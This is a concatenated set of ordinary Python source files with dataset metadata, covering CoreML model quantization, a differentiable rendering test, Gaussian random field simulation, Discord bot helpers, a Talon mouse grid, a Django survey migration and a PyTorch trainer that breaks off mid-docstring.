0.497825
0.417029
0.30578
0.220012
0.220012
0.220012
0
0
0.308063
2,902
103
80
28.174757
0.801295
0.023777
0
0.337838
0
0
0.163005
0.119064
0
0
0
0
0
1
0.310811
false
0
0.013514
0.297297
0.702703
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
8227635dd4b63240fd4ce82b0583156b4ea9480c
510
py
Python
Tools/quantize-models.py
mihaip/solving-bee
bd45fa8414e6553e7a974b07bea4bad46183da71
[ "Apache-2.0" ]
2
2020-11-17T14:52:50.000Z
2021-04-04T20:43:40.000Z
Tools/quantize-models.py
mihaip/solving-bee
bd45fa8414e6553e7a974b07bea4bad46183da71
[ "Apache-2.0" ]
null
null
null
Tools/quantize-models.py
mihaip/solving-bee
bd45fa8414e6553e7a974b07bea4bad46183da71
[ "Apache-2.0" ]
1
2021-04-04T23:40:21.000Z
2021-04-04T23:40:21.000Z
#!/usr/local/bin/python3 import coremltools.models import coremltools.models.neural_network import os.path models_dir = os.path.join(os.path.dirname(__file__), "..", "Solving Bee", "Resources") for model_name in ["LettersModel", "BoardModel"]: model_path = os.path.join(models_dir, f"{model_name}.mlmodel") model_fp32 = coremltools.models.MLModel(model_path) model_fp16 = coremltools.models.neural_network.quantization_utils.quantize_weights(model_fp32, nbits=16) model_fp16.save(model_path)
39.230769
108
0.77451
70
510
5.371429
0.5
0.180851
0.12234
0.159574
0
0
0
0
0
0
0
0.023861
0.096078
510
12
109
42.5
0.791757
0.045098
0
0
0
0
0.131687
0
0
0
0
0
0
1
0
false
0
0.333333
0
0.333333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
8227caa8afc429ee4cb7a62a33c9415eba7a7d1a
4,718
py
Python
tests/test_vertex_color.py
aferrall/redner
be52e4105140f575f153d640ba889eb6e6015616
[ "MIT" ]
1,146
2018-11-11T01:47:18.000Z
2022-03-31T14:11:03.000Z
tests/test_vertex_color.py
Awcrr/redner
b4f57037af26b720d916bbaf26103a3499101a9f
[ "MIT" ]
177
2018-11-13T22:48:25.000Z
2022-03-30T07:19:29.000Z
tests/test_vertex_color.py
Awcrr/redner
b4f57037af26b720d916bbaf26103a3499101a9f
[ "MIT" ]
127
2018-11-11T02:32:17.000Z
2022-03-31T07:24:03.000Z
import pyredner import redner import numpy as np import torch import math # Example of optimizing vertex color of a sphere. # Use GPU if available pyredner.set_use_gpu(torch.cuda.is_available()) cam = pyredner.Camera(position = torch.tensor([0.0, 0.0, -5.0]), look_at = torch.tensor([0.0, 0.0, 0.0]), up = torch.tensor([0.0, 1.0, 0.0]), fov = torch.tensor([45.0]), # in degree clip_near = 1e-2, # needs to > 0 resolution = (256, 256)) # Set "use_vertex_color = True" to use vertex color mat_vertex_color = pyredner.Material(use_vertex_color = True) materials = [mat_vertex_color] vertices, indices, uvs, normals = pyredner.generate_sphere(128, 64) # For the target we randomize the vertex color. vertex_color = torch.zeros_like(vertices).uniform_(0.0, 1.0) shape_sphere = pyredner.Shape(\ vertices = vertices, indices = indices, uvs = uvs, normals = normals, colors = vertex_color, # use the 'colors' field in Shape to store the color material_id = 0) shapes = [shape_sphere] envmap = pyredner.imread('sunsky.exr') if pyredner.get_use_gpu(): envmap = envmap.cuda(device = pyredner.get_device()) envmap = pyredner.EnvironmentMap(envmap) scene = pyredner.Scene(cam, shapes, materials, [], envmap) scene_args = pyredner.RenderFunction.serialize_scene(\ scene = scene, num_samples = 256, max_bounces = 1, channels = [redner.channels.radiance, redner.channels.vertex_color]) render = pyredner.RenderFunction.apply img = render(0, *scene_args) img_radiance = img[:, :, :3] img_vertex_color = img[:, :, 3:] pyredner.imwrite(img_radiance.cpu(), 'results/test_vertex_color/target.exr') pyredner.imwrite(img_radiance.cpu(), 'results/test_vertex_color/target.png') pyredner.imwrite(img_vertex_color.cpu(), 'results/test_vertex_color/target_color.png') target_radiance = pyredner.imread('results/test_vertex_color/target.exr') if pyredner.get_use_gpu(): target_radiance = target_radiance.cuda() # Initial guess. Set to 0.5 for all vertices. shape_sphere.colors = \ torch.zeros_like(vertices, device = pyredner.get_device()) + 0.5 shape_sphere.colors.requires_grad = True # We render both the radiance and the vertex color here. # The vertex color is only for visualization. scene_args = pyredner.RenderFunction.serialize_scene(\ scene = scene, num_samples = 256, max_bounces = 1, channels = [redner.channels.radiance, redner.channels.vertex_color]) img = render(1, *scene_args) img_radiance = img[:, :, :3] img_vertex_color = img[:, :, 3:] pyredner.imwrite(img_radiance.cpu(), 'results/test_vertex_color/init.png') pyredner.imwrite(img_vertex_color.cpu(), 'results/test_vertex_color/init_color.png') diff = torch.abs(target_radiance - img_radiance) pyredner.imwrite(diff.cpu(), 'results/test_vertex_color/init_diff.png') optimizer = torch.optim.Adam([shape_sphere.colors], lr=1e-2) for t in range(100): print('iteration:', t) optimizer.zero_grad() scene_args = pyredner.RenderFunction.serialize_scene(\ scene = scene, num_samples = 4, max_bounces = 1, channels = [redner.channels.radiance, redner.channels.vertex_color]) img = render(t+1, *scene_args) img_radiance = img[:, :, :3] img_vertex_color = img[:, :, 3:] pyredner.imwrite(img_radiance.cpu(), 'results/test_vertex_color/iter_{}.png'.format(t)) pyredner.imwrite(img_vertex_color.cpu(), 'results/test_vertex_color/iter_color_{}.png'.format(t)) loss = torch.pow(img_radiance - target_radiance, 2).sum() print('loss:', loss.item()) loss.backward() optimizer.step() # Clamp the data to valid range. shape_sphere.colors.data.clamp_(0.0, 1.0) scene_args = pyredner.RenderFunction.serialize_scene(\ scene = scene, num_samples = 256, max_bounces = 1, channels = [redner.channels.radiance, redner.channels.vertex_color]) img = render(102, *scene_args) img_radiance = img[:, :, :3] img_vertex_color = img[:, :, 3:] pyredner.imwrite(img_radiance.cpu(), 'results/test_vertex_color/final.exr') pyredner.imwrite(img_radiance.cpu(), 'results/test_vertex_color/final.png') pyredner.imwrite(img_vertex_color.cpu(), 'results/test_vertex_color/final_color.png') pyredner.imwrite(torch.abs(target_radiance - img_radiance).cpu(), 'results/test_vertex_color/final_diff.png') from subprocess import call call(["ffmpeg", "-framerate", "24", "-i", "results/test_vertex_color/iter_%d.png", "-vb", "20M", "results/test_vertex_color/out.mp4"]) call(["ffmpeg", "-framerate", "24", "-i", "results/test_vertex_color/iter_color_%d.png", "-vb", "20M", "results/test_vertex_color/out_color.mp4"])
39.983051
109
0.708563
658
4,718
4.867781
0.218845
0.137371
0.090228
0.116766
0.536684
0.53606
0.466438
0.466438
0.453637
0.432407
0
0.022989
0.151759
4,718
118
110
39.983051
0.777361
0.087325
0
0.319588
0
0
0.168335
0.150407
0
0
0
0
0
1
0
false
0
0.061856
0
0.061856
0.020619
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
8227d244a3f5042b87acfe74836b3be3d5794b53
10,066
py
Python
starterlite/simulation/GRF.py
gjsun/starterlite
4838c0b9837e0012157596984f9e39ed52f9c86c
[ "MIT" ]
null
null
null
starterlite/simulation/GRF.py
gjsun/starterlite
4838c0b9837e0012157596984f9e39ed52f9c86c
[ "MIT" ]
null
null
null
starterlite/simulation/GRF.py
gjsun/starterlite
4838c0b9837e0012157596984f9e39ed52f9c86c
[ "MIT" ]
null
null
null
import numpy as np import os from ..analysis import Sensitivity from ..physics import Cosmology from ..physics.Constants import c, cm_per_mpc from ..util.ParameterFile import ParameterFile from .FourierSpace import FourierSpace """ ------------ Instructions ------------ The GRF module allows the user to generate realizations of a Gaussian random field with an input power spectrum, and compute power spectrum from a given map of fluctuations in real space. This module has benefited a lot from the imapper2 package developed by Tony Li. """ class GaussianRandomField(FourierSpace): def __init__(self, **kwargs): FourierSpace.__init__(self, **kwargs) self.pf = ParameterFile(**kwargs) # Get the redshift of the interested signal self._z = self.pf.grf_params['grf_z_signal'] # Specify the survey geometry self._survey_goemetry = np.array([self.pf.grf_params['grf_geom_x'], self.pf.grf_params['grf_geom_y'], self.pf.grf_params['grf_geom_z']]) # Get the wavelength [cm] of the interested signal self.wv_signal = self.pf.grf_params['grf_lambda_signal'] # Get the assumed aperture size (diameter) of dish self.d_ap = self.pf.grf_params['grf_d_ap'] self._powerspectrum_in = self.pf.grf_params['grf_ps_in'] @property def cosm(self): if not hasattr(self, '_cosm'): self._cosm = Cosmology( omega_m_0=self.pf.cosmo_params['omega_m_0'], omega_l_0=self.pf.cosmo_params['omega_l_0'], omega_b_0=self.pf.cosmo_params['omega_b_0'], hubble_0=self.pf.cosmo_params['hubble_0'], helium_by_number=self.pf.cosmo_params['helium_by_number'], cmb_temp_0=self.pf.cosmo_params['cmb_temp_0'], approx_highz=self.pf.cosmo_params['approx_highz'], sigma_8=self.pf.cosmo_params['sigma_8'], primordial_index=self.pf.cosmo_params['primordial_index']) return self._cosm @property def sens(self, **kwargs): if not hasattr(self, '_sens'): self._sens = Sensitivity(**kwargs) return self._sens @property def z(self): if not hasattr(self, '_z'): raise ValueError('must specify a redshift for which the fluctuations of target signal will be simulated!') return self._z @z.setter def z(self, value): if value in [6.0]: self._z = value else: raise ValueError('invalid signal redshift!') @property def survey_goemetry(self): if not hasattr(self, '_survey_goemetry'): raise ValueError('must specify a survey geometry for the simulation!') return self._survey_goemetry @survey_goemetry.setter def survey_goemetry(self, value): if (np.alltrue(value>0)) and (np.size(value)==3): self._survey_goemetry = value #print 'updated default geometry to %s!'%(self._survey_goemetry) else: raise ValueError('input survey geometry invalid!') @property def PowerSpectrum(self): if not hasattr(self, '_PowerSpectrum'): raise ValueError('To simulate a GRF, must supply an input PS!') return self._PowerSpectrum @PowerSpectrum.setter def PowerSpectrum(self, value): if callable(value): self._PowerSpectrum = value else: raise ValueError('Input power spectrum must be a callable function of k!') @property def n_ch_x(self): return self.survey_goemetry[0] @property def n_ch_y(self): return self.survey_goemetry[1] @property def n_ch_z(self): return self.survey_goemetry[2] @property def n_beam(self): return self.survey_goemetry[0] * self.survey_goemetry[1] @property def n_channel(self): return self.survey_goemetry[-1] def SetGrid(self, L_x, L_y, L_z): """ Set x (real space) and k (fourier space) grids ---------------------------------------- :param L_x: length of survey volume along 1st dimension; {scalar} :param L_y: length of survey volume along 2nd dimension; {scalar} :param L_z: length of survey volume along 3rd (LOS) dimension; {scalar} :return: """ _lslab_x = L_x _lslab_y = L_y _lslab_z = L_z # Define the large simulation box within which the survey volume is embedded _lsim_x = _lsim_y = _lsim_z = _lslab_z # Mpc h^-1 _dx = _lslab_x / self.n_ch_x # Mpc h^-1 _dy = _lslab_y / self.n_ch_y # Mpc h^-1 _dz = _lslab_z / self.n_ch_z # Mpc h^-1 self.nx_sim = int(np.round(_lsim_x / _dx)) self.ny_sim = int(np.round(_lsim_y / _dy)) self.nz_sim = int(np.round(_lsim_z / _dz)) self.xs = np.linspace(-self.nx_sim//2 + self.nx_sim%2, self.nx_sim//2 - 1 + self.nx_sim%2, self.nx_sim) * _dx self.ys = np.linspace(-self.ny_sim//2 + self.ny_sim%2, self.ny_sim//2 - 1 + self.ny_sim%2, self.ny_sim) * _dy self.zs = np.linspace(-self.nz_sim//2 + self.nz_sim%2, self.nz_sim//2 - 1 + self.nz_sim%2, self.nz_sim) * _dz self.r = np.sqrt(self.xs[:,np.newaxis,np.newaxis]**2 + self.ys[np.newaxis,:,np.newaxis]**2 + self.zs[np.newaxis,np.newaxis,:]**2) sim = np.zeros((self.nx_sim, self.ny_sim, self.nz_sim), float) self.npix_cen = self.nx_sim // 2 - 1 if self.n_ch_y==1: # real-space weighting function sim[int(self.npix_cen - (self.n_beam // 2)):int(self.npix_cen + (self.n_beam // 2)), self.npix_cen, 0:] = 1.0 else: raise NotImplementedError('help!') _kx = 2*np.pi * np.fft.fftfreq(self.nx_sim, _dx) _ky = 2*np.pi * np.fft.fftfreq(self.ny_sim, _dy) _kz = 2*np.pi * np.fft.fftfreq(self.nz_sim, _dz) _dkx = abs(_kx[1] - _kx[0]) _dky = abs(_ky[1] - _ky[0]) _dkz = abs(_kz[1] - _kz[0]) self.k = np.sqrt(_kx[:,np.newaxis,np.newaxis]**2 + _ky[np.newaxis,:,np.newaxis]**2 + _kz[np.newaxis,np.newaxis,:]**2) _box_vol = _lsim_x * _lsim_y * _lsim_z _pix_vol = _box_vol / (self.nx_sim * self.ny_sim * self.nz_sim) self.scale_factor = np.sqrt(_pix_vol**2 / _box_vol) def GenerateGRF(self, L_x, L_y, L_z, n_samples=1): """ Generate Gaussian random field according to the provided geometry and power spectrum ---------------------------------------- :param L_x: length of survey volume along 1st dimension; {scalar} :param L_y: length of survey volume along 2nd dimension; {scalar} :param L_z: length of survey volume along 3rd (LOS) dimension; {scalar} :param n_samples: number of GRF realizations to generate :return: """ self.fn = 'grf_samples_x%dy%dz%d_N%d' % (self.n_ch_x, self.n_ch_y, self.n_ch_z, n_samples) if not callable(self.PowerSpectrum): raise TypeError('Input power spectrum must be a callable function of k!') self.survey_maps = np.zeros((self.n_ch_x, self.n_ch_y, self.n_ch_z, n_samples)) print('\nGenerating x (real space) and k (fourier space) grids...') self.SetGrid(L_x=L_x, L_y=L_y, L_z=L_z) print('\nReading in power spectrum...') try: Pk = self.PowerSpectrum(self.k) assert Pk[Pk >= 0.0].size == Pk.size except: raise ValueError('Oops!') print('\nGenerating GRF realizations...') if self.n_ch_y == 1: for i in range(n_samples): # Generate real and imaginary parts rand = np.random.RandomState(seed=(42 + i)) realspace_vec_r = rand.normal(loc=0.0, scale=1.0, size=self.r.shape) realspace_vec_i = rand.normal(loc=0.0, scale=1.0, size=self.r.shape) realspace_map = (realspace_vec_r + realspace_vec_i * 1.0j) fourierspace_map = np.fft.fftn(realspace_map) / np.sqrt(self.nx_sim * self.ny_sim * self.nz_sim) ft_map = np.sqrt(Pk) * fourierspace_map / self.scale_factor ft_map[0, 0, 0] = 0.0 full_map = np.fft.ifftn(ft_map) full_map = np.real(full_map) survey_map = full_map[int(self.npix_cen-(self.n_ch_x//2)):int(self.npix_cen+(self.n_ch_x//2)), self.npix_cen, :] self.survey_maps[:, 0, :, i] = survey_map print('%d out of %d realizations completed!'%(i+1, n_samples)) self.survey_map_coords = [self.xs[int(self.npix_cen-(self.n_ch_x//2)):int(self.npix_cen+(self.n_ch_x//2))], None, self.zs] else: raise NotImplementedError('help!') self.save() print('\n--- DONE ---\n') def save(self, format='npz'): """ Save derived window functions to file ---------------------------------------- :param format: format of output file; {str} """ _path = os.getenv('STARTERLITE') + '/output/grf/%s.%s' % (self.fn, format) _wf_dict = {'grf': self.survey_maps, 'coords': self.survey_map_coords} np.savez(_path, **_wf_dict) def GetObsPS2D_NoAvg(self, ps3d, T_matrix_path): """ Obtain the observed 2D PS for a given true, 3D PS and a projection (WF) matrix ---------------------------------------- :param ps3d: true spatial power spectrum; {callable function} :param T_matrix_path: path to transfer matrix; {str} :return: observed power spectrum and bin edges """ T_matrix_data = np.load(T_matrix_path) T_matrix = T_matrix_data['T_matrix'] # of size (NKx * NKz, Nkbins) k3d_bins = T_matrix_data['k3d_bins'] K2D_bins = T_matrix_data['K2D_matrix'] # of size (NKx * NKz, 2) PS2D_from_mat = np.matmul(T_matrix, ps3d(k3d_bins)) return K2D_bins, PS2D_from_mat
36.078853
137
0.597457
1,441
10,066
3.932686
0.195697
0.009529
0.018528
0.026998
0.344627
0.256397
0.198165
0.16252
0.127228
0.112935
0
0.015481
0.268428
10,066
279
138
36.078853
0.754074
0.154878
0
0.119497
0
0
0.104833
0.003146
0
0
0
0
0.006289
1
0.113208
false
0
0.044025
0.031447
0.232704
0.031447
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
8229233dd2ae5f0912a4213d1c4e8a168847a08a
3,679
py
Python
botpumpkin/discord/context.py
Anthrasite/BotPumpkin
99267a9cb3d263f5cd302ee548c49c59fafcce3f
[ "MIT" ]
null
null
null
botpumpkin/discord/context.py
Anthrasite/BotPumpkin
99267a9cb3d263f5cd302ee548c49c59fafcce3f
[ "MIT" ]
24
2021-03-08T00:28:13.000Z
2021-04-09T22:26:26.000Z
botpumpkin/discord/context.py
Anthrasite/BotPumpkin
99267a9cb3d263f5cd302ee548c49c59fafcce3f
[ "MIT" ]
null
null
null
"""A collection of utility functions for performing typing and error checking on discord.ext.commands.Context objects.""" from typing import List, Optional, Union # Third party imports import discord from discord.ext import commands # First party imports import botpumpkin.discord.guild as guild_util # *** get_guild ************************************************************* def get_guild(context: commands.Context) -> discord.Guild: """Return the guild from the given context. Args: context (commands.Context): The context to return the guild from. Raises: ValueError: Raised if the context contains no guild. Returns: discord.Guild: The guild from the given context. """ guild: Optional[discord.Guild] = context.guild if guild is None: raise ValueError("context.guild has no value") return guild # *** get_guild_channels **************************************************** def get_guild_channels(context: commands.Context) -> List[Union[discord.TextChannel, discord.VoiceChannel, discord.CategoryChannel, discord.StoreChannel]]: """Return a list of all channels from the given context. Args: context (commands.Context): The context to return all channels from. Raises: ValueError: Raised if the guild from the given context has no list of channels. Returns: List[Union[discord.TextChannel, discord.VoiceChannel, discord.CategoryChannel, discord.StoreChannel]]: The list of channels from the given context. """ channels: List[Union[discord.TextChannel, discord.VoiceChannel, discord.CategoryChannel, discord.StoreChannel]] = get_guild(context).channels if channels is None: raise ValueError("context.guild.channels has no value") return channels # *** get_channel *********************************************************** def get_channel(context: commands.Context) -> discord.TextChannel: """Return the channel from the given context. Args: context (commands.Context): The context to return the channel from. Raises: ValueError: Raised if the channel is not a TextChannel, which means the channel is not from a guild. Returns: discord.TextChannel: The channel from the given context. """ channel: Union[discord.TextChannel, discord.DMChannel, discord.GroupChannel] = context.channel if not isinstance(channel, discord.TextChannel): raise ValueError("Channel is not from guild") return channel # *** get_channel_by_name *************************************************** def get_channel_by_name(context: commands.Context, channel_name: str) -> discord.TextChannel: """Return the channel from the list of channels in the given context that has the given name. Args: context (commands.Context): The context to return the channel from. channel_name (int): The name of the channel to return. Returns: discord.TextChannel: The channel with the given name from the given context. """ return guild_util.get_channel_by_name(get_guild(context), channel_name) # *** get_author ************************************************************ def get_author(context: commands.Context) -> discord.Member: """Return the member who sent the message for the given context. Args: context (commands.Context): The context to return the author from. Returns: discord.Member: The author for the given context. """ author: Union[discord.User, discord.Member] = context.author if not isinstance(author, discord.Member): raise ValueError("Author is not from guild") return author
36.068627
155
0.662136
437
3,679
5.514874
0.171625
0.043154
0.068465
0.063071
0.431535
0.375519
0.274689
0.243568
0.243568
0.243568
0
0
0.186192
3,679
101
156
36.425743
0.804943
0.544441
0
0
0
0
0.073041
0.014608
0
0
0
0
0
1
0.192308
false
0
0.153846
0
0.538462
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
8229dbbb6f0052b556f0fa37fd3095bf537d9605
5,180
py
Python
fine_grid.py
daveweij/fine_mouse_grid_talon
d13d942f977d06d8f17d9a14988811bae69ac2cd
[ "MIT" ]
null
null
null
fine_grid.py
daveweij/fine_mouse_grid_talon
d13d942f977d06d8f17d9a14988811bae69ac2cd
[ "MIT" ]
null
null
null
fine_grid.py
daveweij/fine_mouse_grid_talon
d13d942f977d06d8f17d9a14988811bae69ac2cd
[ "MIT" ]
null
null
null
import typing import os import json from talon import Module, Context, canvas, screen, ui, ctrl, settings from talon.skia import Paint, Rect from talon.types.point import Point2d mod = Module() ctx = Context() mod.tag('fine_grid_enabled', desc='Tag enables fine grid commands') class FineMouseGrid: ZOOM_RATIO = 0.6 def __init__(self): self.screen = None self.mcanvas = None self.rect = None self.active = False letters = [chr(97 + i) for i in range(26)] numbers = [str(i) for i in range(10)] self.columns = letters + numbers self.rows = letters + numbers def setup(self, *, screen_num: int = None): screens = ui.screens() # each if block here might set the rect to None to indicate failure if screen_num is not None: screen = screens[screen_num % len(screens)] else: screen = screens[0] if not self.rect: rect = screen.rect self.rect = rect.copy() self.screen = screen if self.mcanvas is not None: self.mcanvas.close() self.mcanvas = canvas.Canvas.from_screen(screen) self.mcanvas.register("draw", self.draw) self.mcanvas.freeze() def draw(self, canvas): def draw_text(offset_x, offset_y, width, height): row_height = height / len(self.rows) column_width = width / len(self.columns) canvas.paint.text_align = canvas.paint.TextAlign.CENTER canvas.paint.textsize = 16 for row, row_char in enumerate(self.rows): for col, col_char in enumerate(self.columns): coordinate_x = offset_x + column_width * (col + 0.5) coordinate_y = offset_y + row_height * (row + 0.5) text_string = f"{row_char}{col_char}" text_rect = canvas.paint.measure_text(text_string)[1] background_rect = text_rect.copy() background_rect.center = Point2d( coordinate_x, coordinate_y, ) background_rect = background_rect.inset(-4) canvas.paint.color = "9999994f" canvas.paint.style = Paint.Style.FILL canvas.draw_rect(background_rect) canvas.paint.color = "00ff008f" canvas.draw_text( text_string, coordinate_x, coordinate_y + text_rect.height / 2, ) draw_text(self.rect.x, self.rect.y, self.rect.width, self.rect.height) self.active = True def close(self): self.mcanvas.unregister("draw", self.draw) self.mcanvas.close() self.mcanvas = None self.active = False def reset(self): self.rect = None self.redraw() def redraw(self): self.close() self.setup() self.draw(self.mcanvas) def get_coordinate(self, row: str, column: str): column_index = self.columns.index(column) row_index = self.rows.index(row) x = self.rect.x + self.rect.width * (column_index + 0.5) / len(self.columns) y = self.rect.y + self.rect.height * (row_index + 0.5) / len(self.rows) return x, y def go_coordinate(self, row: str, column: str): ctrl.mouse_move(*self.get_coordinate(row, column)) def zoom(self, row: str, column: str): x, y = self.get_coordinate(row, column) xnew_min = self.rect.x xnew_max = self.rect.x + (1 - self.ZOOM_RATIO)*self.rect.width xnew = x - 0.5*self.ZOOM_RATIO*self.rect.width self.rect.x = max(min(xnew, xnew_max), xnew_min) ynew_min = self.rect.y ynew_may = self.rect.y + (1 - self.ZOOM_RATIO)*self.rect.height ynew = y - 0.5*self.ZOOM_RATIO*self.rect.height self.rect.y = max(min(ynew, ynew_may), ynew_min) self.rect.width = self.ZOOM_RATIO*self.rect.width self.rect.height = self.ZOOM_RATIO*self.rect.height self.redraw() grid = FineMouseGrid() @mod.capture(rule="(<user.letter> | <user.number_key>) (<user.letter> | <user.number_key>)") def coordinate(m) -> str: "column or row character" return ','.join(m) @mod.action_class class GridActions: def fine_grid_activate(): """activate chess board""" ctx.tags = ['user.fine_grid_enabled'] grid.rect = None if not grid.mcanvas: grid.setup() grid.draw(grid.mcanvas) def fine_grid_close(): """Close the chessboard""" print(ctx.tags) grid.close() ctx.tags = [] def go_coordinate(coordinate: str): """select coordinate""" print(coordinate) row, column = coordinate.split(',') grid.go_coordinate(row, column) def zoom(coordinate: str): """zoom""" row, column = coordinate.split(',') grid.zoom(row, column) def fine_grid_reset(): """reset grid to original state""" grid.reset()
31.585366
92
0.570463
647
5,180
4.440495
0.224111
0.072398
0.027149
0.035503
0.237731
0.098851
0.05952
0.023669
0
0
0
0.011861
0.316409
5,180
163
93
31.779141
0.799492
0.035521
0
0.113821
0
0.00813
0.04205
0.004405
0
0
0
0
0
1
0.130081
false
0
0.04878
0
0.219512
0.01626
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
822a62340464846a070b674b57e4a94852e76fd0
2,261
py
Python
molo/surveys/migrations/0014_update_skip_logic.py
praekelt/molo.surveys
c86d231f7cee669eb1c91db49ec05cf711984e30
[ "BSD-3-Clause" ]
null
null
null
molo/surveys/migrations/0014_update_skip_logic.py
praekelt/molo.surveys
c86d231f7cee669eb1c91db49ec05cf711984e30
[ "BSD-3-Clause" ]
88
2016-06-14T18:36:18.000Z
2018-09-21T07:33:58.000Z
molo/surveys/migrations/0014_update_skip_logic.py
praekeltfoundation/molo.surveys
c86d231f7cee669eb1c91db49ec05cf711984e30
[ "BSD-3-Clause" ]
1
2017-10-02T09:27:45.000Z
2017-10-02T09:27:45.000Z
# -*- coding: utf-8 -*- # Generated by Django 1.9.13 on 2017-10-11 13:10 from __future__ import unicode_literals from django.db import migrations import molo.surveys.blocks import wagtail.core.blocks class Migration(migrations.Migration): dependencies = [ ('surveys', '0013_add_streamfield_for_skip_logic'), ] operations = [ migrations.AlterModelOptions( name='molosurveyformfield', options={'ordering': ['sort_order']}, ), migrations.AlterModelOptions( name='personalisablesurveyformfield', options={'ordering': ['sort_order'], 'verbose_name': 'personalisable form field'}, ), migrations.AlterField( model_name='molosurveyformfield', name='skip_logic', field=molo.surveys.blocks.SkipLogicField([(b'skip_logic', wagtail.core.blocks.StructBlock([(b'choice', wagtail.core.blocks.CharBlock()), (b'skip_logic', wagtail.core.blocks.ChoiceBlock(choices=[(b'next', b'Next default question'), (b'end', b'End of survey'), (b'question', b'Another question'), (b'survey', b'Another survey')])), (b'survey', wagtail.core.blocks.PageChooserBlock(required=False, target_model='surveys.MoloSurveyPage')), (b'question', molo.surveys.blocks.QuestionSelectBlock(help_text=b'Please save the survey as a draft to populate or update the list of questions.', required=False))]))], blank=True, verbose_name=b'Answer options'), ), migrations.AlterField( model_name='personalisablesurveyformfield', name='skip_logic', field=molo.surveys.blocks.SkipLogicField([(b'skip_logic', wagtail.core.blocks.StructBlock([(b'choice', wagtail.core.blocks.CharBlock()), (b'skip_logic', wagtail.core.blocks.ChoiceBlock(choices=[(b'next', b'Next default question'), (b'end', b'End of survey'), (b'question', b'Another question'), (b'survey', b'Another survey')])), (b'survey', wagtail.core.blocks.PageChooserBlock(required=False, target_model='surveys.MoloSurveyPage')), (b'question', molo.surveys.blocks.QuestionSelectBlock(help_text=b'Please save the survey as a draft to populate or update the list of questions.', required=False))]))], blank=True, verbose_name=b'Answer options'), ), ]
62.805556
661
0.693941
269
2,261
5.732342
0.319703
0.064202
0.099222
0.044099
0.649805
0.649805
0.649805
0.649805
0.649805
0.649805
0
0.011012
0.156568
2,261
35
662
64.6
0.797588
0.030075
0
0.428571
1
0
0.323744
0.062557
0
0
0
0
0
1
0
false
0
0.142857
0
0.25
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
822a641495e4387a0c1f14cf9ebd06d65a7a819c
7,355
py
Python
jdit/trainer/single/sup_single.py
dingguanglei/jdit
ef878e696c9e2fad5069f106496289d4e4cc6154
[ "Apache-2.0" ]
28
2019-06-18T15:56:53.000Z
2021-11-09T13:11:13.000Z
jdit/trainer/single/sup_single.py
dingguanglei/jdit
ef878e696c9e2fad5069f106496289d4e4cc6154
[ "Apache-2.0" ]
2
2018-10-24T01:09:56.000Z
2018-11-08T07:13:48.000Z
jdit/trainer/single/sup_single.py
dingguanglei/jdit
ef878e696c9e2fad5069f106496289d4e4cc6154
[ "Apache-2.0" ]
8
2019-01-11T01:12:15.000Z
2021-03-12T10:15:43.000Z
from ..super import SupTrainer from tqdm import tqdm import torch from jdit.optimizer import Optimizer from jdit.model import Model from jdit.dataset import DataLoadersFactory class SupSingleModelTrainer(SupTrainer): """ This is a Single Model Trainer. It means you only have one model. input, gound_truth output = model(input) loss(output, gound_truth) """ def __init__(self, logdir, nepochs, gpu_ids_abs, net: Model, opt: Optimizer, datasets: DataLoadersFactory): super(SupSingleModelTrainer, self).__init__(nepochs, logdir, gpu_ids_abs=gpu_ids_abs) self.net = net self.opt = opt self.datasets = datasets self.fixed_input = None self.input = None self.output = None self.ground_truth = None def train_epoch(self, subbar_disable=False): for iteration, batch in tqdm(enumerate(self.datasets.loader_train, 1), unit="step", disable=subbar_disable): self.step += 1 self.input, self.ground_truth = self.get_data_from_batch(batch, self.device) self.output = self.net(self.input) self._train_iteration(self.opt, self.compute_loss, csv_filename="Train") if iteration == 1: self._watch_images("Train") def get_data_from_batch(self, batch_data: list, device: torch.device): """ Load and wrap data from the data lodaer. Split your one batch data to specify variable. Example:: # batch_data like this [input_Data, ground_truth_Data] input_cpu, ground_truth_cpu = batch_data[0], batch_data[1] # then move them to device and return them return input_cpu.to(self.device), ground_truth_cpu.to(self.device) :param batch_data: one batch data load from ``DataLoader`` :param device: A device variable. ``torch.device`` :return: input Tensor, ground_truth Tensor """ input_tensor, ground_truth_tensor = batch_data[0], batch_data[1] return input_tensor, ground_truth_tensor def _watch_images(self, tag: str, grid_size: tuple = (3, 3), shuffle=False, save_file=True): """ Show images in tensorboard To show images in tensorboad. If want to show fixed input and it's output, please use ``shuffle=False`` to fix the visualized data. Otherwise, it will sample and visualize the data randomly. Example:: # show fake data self.watcher.image(self.output, self.current_epoch, tag="%s/output" % tag, grid_size=grid_size, shuffle=shuffle, save_file=save_file) # show ground_truth self.watcher.image(self.ground_truth, self.current_epoch, tag="%s/ground_truth" % tag, grid_size=grid_size, shuffle=shuffle, save_file=save_file) # show input self.watcher.image(self.input, self.current_epoch, tag="%s/input" % tag, grid_size=grid_size, shuffle=shuffle, save_file=save_file) :param tag: tensorboard tag :param grid_size: A tuple for grad size which data you want to visualize :param shuffle: If shuffle the data. :param save_file: If save this images. :return: """ self.watcher.image(self.output, self.current_epoch, tag="%s/output" % tag, grid_size=grid_size, shuffle=shuffle, save_file=save_file) self.watcher.image(self.ground_truth, self.current_epoch, tag="%s/ground_truth" % tag, grid_size=grid_size, shuffle=shuffle, save_file=save_file) def compute_loss(self) -> (torch.Tensor, dict): """ Rewrite this method to compute your own loss Discriminator. Use self.input, self.output and self.ground_truth to compute loss. You should return a **loss** for the first position. You can return a ``dict`` of loss that you want to visualize on the second position.like Example:: var_dic = {} 